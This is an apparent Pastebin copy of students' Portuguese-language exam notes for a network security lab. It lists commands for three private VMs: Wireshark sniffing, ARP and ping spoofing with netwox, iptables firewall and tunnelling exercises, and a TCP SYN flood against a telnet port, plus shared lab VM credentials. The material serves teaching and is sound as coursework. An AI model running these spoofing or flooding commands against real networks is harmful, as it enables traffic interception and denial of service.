Advertisement
Guest User

Untitled

a guest
Dec 14th, 2016
92
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 2.65 KB | None | 0 0
  1. ################ PROVA 3 - Segurança Digital na Prática
  2. ### Alunos: Lorena Marques Cerbino - 2013063088
  3. ### Lucas de Miranda Bastos - 2013017595
  4. ### Professor: Leonardo Barbosa
  5. ################
  6.  
  7. # IP VM Cliente: 192.168.56.10
  8. # IP VM Server: 192.168.56.11
  9. # IP VM Observadora/Atacante: 192.168.56.12
  10. # Para Todas as VMs: user: digitalsec | password: digisec
  11.  
  12. #Observação: Os comandos ssh e telnet precisam de usuário e senha após sua execução
  13.  
  14. ######### Laboratório 1 - Sniff-then-Spoof #########
  15. ###### TASK 1 - Sniffing
  16. ### VM 1 Cliente
  17. telnet 192.168.56.11
  18. ssh 192.168.56.11
  19.  
  20. ### VM 2 Server
  21. sudo service openbsd-inetd start
  22. sudo service ssh start
  23.  
  24. ### VM 3 Atacante
  25. sudo wireshark
  26.  
  27. ###### TASK 2 - Spoofing
  28. ### VM 1 Cliente
  29. ping 192.168.56.11
  30. ping 192.168.56.40
  31. ping 192.168.56.41
  32. ping 192.168.56.42
  33. ping 192.168.56.43
  34.  
  35. ### VM 3 Atacante
  36. sudo netwox 73 -d enp0s8 -i "192.168.56/24" -e "08:00:27:cc:14:45" -ap
  37. sudo wireshark
  38.  
  39. ###### TASK 3 - ARP and PING Spoofing
  40. ##Obs: o comando sudo ip -s -s neigh flush all limpa a tabela arp
  41.  
  42. ### VM 1 Cliente
  43. sudo ip -s -s neigh flush all
  44. ping 192.168.56.11
  45.  
  46. ### VM 3 Atacante
  47. sudo netwox 73 -d enp0s8 -i "192.168.56.11" -e "08:00:27:cc:14:3e" -ap
  48. sudo netwox 80 -e "08:00:27:cc:14:3e" -i "192.168.56.11" -d enp0s8 -E 08:00:27:ab:42:ac -I 192.168.56.10
  49. sudo wireshark
  50.  
  51. ######### Laboratório 1 - Firewall #########
  52. ###### TASK 1 - Stateless Firewall
  53. ### VM 1 Cliente
  54. #Antes de ligar o firewall
  55. telnet 192.168.56.11
  56. #Depois de ligar o firewall
  57. telnet 192.168.56.11
  58.  
  59. ### VM 2 Server
  60. sudo iptables -F
  61. telnet 192.168.56.10
  62. sudo iptables -A INPUT -p tcp -i enp0s8 --dport telnet -j REJECT
  63. sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
  64. telnet 192.168.56.10
  65.  
  66. ###### TASK 2 - Statefull Firewall
  67. ### VM 1 Cliente
  68. #Antes de ligar o firewall
  69. telnet 192.168.56.11
  70. #Depois de ligar o firewall
  71. telnet 192.168.56.11
  72.  
  73. ### VM 2 Server
  74. sudo iptables -F
  75. telnet 192.168.56.10
  76. sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
  77. telnet 192.168.56.10
  78.  
  79. ###### TASK 3 - Tunneling
  80. ### VM 1 Cliente
  81. ssh 192.168.56.11
  82. telnet 192.168.56.11
  83.  
  84. ### VM 2 Server
  85. # Mesmos comandos da VM2 da task 2
  86. sudo iptables -F
  87. telnet 192.168.56.10
  88. sudo iptables -A OUTPUT -p tcp -o enp0s8 --dport telnet -j REJECT
  89. telnet 192.168.56.10
  90.  
  91. ######### Laboratório 3 - DoS #########
  92. ###### TASK 1 (No slide aparece como Task 2) - Smurf Attack
  93. ### VM 1 Cliente
  94.  
  95.  
  96. ### VM 2 Server
  97.  
  98.  
  99. ### VM 3 Atacante
  100.  
  101. ###### TASK 2 (No slide aparece como Task 3) - TCP SYN Attack
  102. ### VM 1 Cliente
  103. # desativar o syncookies
  104. sudo sysctl -w net.ipv4.tcp_syncookies=0
  105. # ativar o syncookies
  106. sudo sysctl -w net.ipv4.tcp_syncookies=1
  107.  
  108. ### VM 3 Atacante
  109. sudo netwox 76 -i 192.168.56.10 -p 23 -s best
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement